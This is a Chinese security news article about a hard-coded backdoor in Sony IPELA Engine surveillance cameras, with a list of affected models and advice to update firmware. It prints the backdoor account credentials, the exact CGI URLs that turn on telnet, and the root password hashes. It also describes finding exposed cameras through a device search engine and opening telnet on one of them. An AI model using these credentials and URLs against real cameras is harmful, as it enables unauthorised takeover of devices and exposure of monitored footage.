猫头鹰
信安舆情早知道

索尼摄像头存在后门可允许远程执行命令getshell(附测试过程)

前言

由于索尼摄像头存在后门,可能导致大量的索尼在线摄像头的被黑客劫持并感染了类似Mirai的恶意软件。原因是在索尼摄像头的固件中存在一种硬编码的登录方式可以用来劫持设备并植入类似于Mirai的恶意软件。

sonycam

存在问题的设备是索尼的Professional Ipela Engine IP监控摄像头。该后门于2016年10月份的时候由来自于SEC信息安全咨询公司的专家Stefan Viehböck所发现,并将所发现的问题报告到索尼公司与SEC公司。

“SEC信息安全咨询公司发现索尼的Professional Ipela Engine IP监控摄像头存在后门,这一款摄像头主要为政府和企业提供专业的监控服务。这个后门允许攻击者在受影响的摄像头上执行任意代码”,SEC信息安全咨询公司表示,“攻击者可以通过使用摄像头在网络中立足并发动进一步的攻击,如中断监控功能,发送正在监视中的图像/视频,或添加摄像头到一个类似于Mirai的僵尸网络中,当然也可能只是简单的为了窥探你。该后门影响了索尼80多个型号的摄像头,索尼公司由SEC信息安全咨询公司得知了该后门的详情,并已经对受影响的摄像头发布了更新的固件。”

利用

专家在Web的管理控制台中发现了两个永久的并启用了硬编码方式写入的后门账户:

User debug, Password: popeyeConnection

User primana, Password: primana

这两个账户都可以访问特定的、未记录的CGI功能。

专家解释说,这很有可能导致攻击者通过远程开启Telnet/SSH服务并且导致攻击者获取root权限的Linux Shell。

以下网址一旦发送到网络中存在后门的设备上,将可以通过telnet直接访问设备:

http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9

http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

以上的请求通过触发索尼第五代Ipela Engine摄像头中的prima-factory.cgi从而启动inetd来打开后门,而该后门是运行在23端口上的telnet程序。第六代的摄像头所使用的字符串是“himitunokagi”(日语的“secret key”)。

一旦telnet或SSH服务被启用,攻击者就可以登录为root用户,并获得了操作系统的shell。下面是操作系统级的后门用户的密码哈希值:

   root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)

   root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

恶意攻击者可以轻易地破解上述的root密码的hash值(MottoIN小编表示网上并没有发现该hash的破解值,读者可以自行测试)。

下面是存在后门的索尼摄像头的型号,专家建议有使用下面型号的用户尽快更新固件(可以检查一下你的摄像头是否是以下的类型):

SNC-CX600,SNC-CX600W,SNC-EB600,SNC-EB600B,SNC EB602R,SNC-EB630,SNC-EB630B,SNC-EB632R,SNC-EM600,SNC-EM601,SNC-EM602R,SNC-EM602RC,SNC-EM630 ,SNC-EM631,SNC-EM632R,SNC-EM632RC,SNC-VB600,SNC-VB600B,SNC-VB600B5,SNC-VB630,SNC-VB6305,SNC-VB6307,SNC-VB632D,SNC-VB635,SNC-VM600,SNC -VM600B,SNC-VM600B5,SNC-VM601,SNC-VM601B,SNC-VM602R,SNC-VM630,SNC-VM6305,SNC-VM6307,SNC-VM631,SNC-VM632R,SNC-WR600,SNC-WR602,SNC-WR602C ,SNC-WR630,SNC-WR632,SNC-WR632C,SNC-XM631,SNC-XM632,SNC-XM636,SNC-XM637,SNC-VB600L,SNC-VM600L,SNC-XM631L,SNC-WR602CL,SNC-CH115,SNC -CH120,SNC-CH160,SNC-CH220,SNC-CH260,SNC-DH120,SNC-DH120T,SNC-DH160,SNC-DH220,SNC-DH220T,SNC-DH260,SNC-EB520,SNC-EM520,SNC-EM521 ,SNC-ZB550,SNC-ZM550,SNC-ZM551,SNC-EP550,SNC-EP580,SNC-ER550,SNC-ER550C,SNC-ER580,SNC-ER585,SNC-ER585H,SNC-ZP550,SNC-ZR550,SNC -EP520,SNC-EP521,SNC-ER520,SNC-ER521,和SNC-ER521C。

测试过程

0x01 查找索尼摄像头

app:"Sony Network Camera"

 0x02 开启telnet

在上述文章中提到通过输入特定的网址即可开启telnet,但在测试的过程中需要确定摄像头的版本:

c1_1

上面我们输入了第一条命令,然后摄像头弹出提示需要登录,上述的两个用户名随意选一填之。

此时打开Telnet连接看看:

tel1_1

但是很遗憾的是连接失败,说明上面的第一条测试命令失败,然后我们继续测试上面的第二条地址,同样的过程,然后我们再来尝试Telnet:

tel3_1

可以看到被测试的远程摄像机执行第二条命令成功,同时在23端口打开了Telnet服务。接下来只是登录的问题了。

索尼公司已经为上述涉及到该后门的摄像头更新了固件,同时希望各位使用索尼摄像头的用户及时到索尼官网更新摄像头的固件。

【本篇文章由MottoIN小编Tower整理发布,转载请注明来源

转载请注明来自MottoIN,未经允许不得转载!MottoIN » 索尼摄像头存在后门可允许远程执行命令getshell(附测试过程)

分享到:更多 ()

评论 2

评论前必须登录!

 

  1. #1

    密码呢?开启TELNET后,那两个密码根本就无法登录

    ckibtg1个月前 (12-13)
    • Tower

      那两个密码是passwd里面的hash值,需要解密。另外不排除设备的root密码被更改过的可能

      Tower1个月前 (12-13)

MottoIN 换一个角度看安全

寻求报道联系我们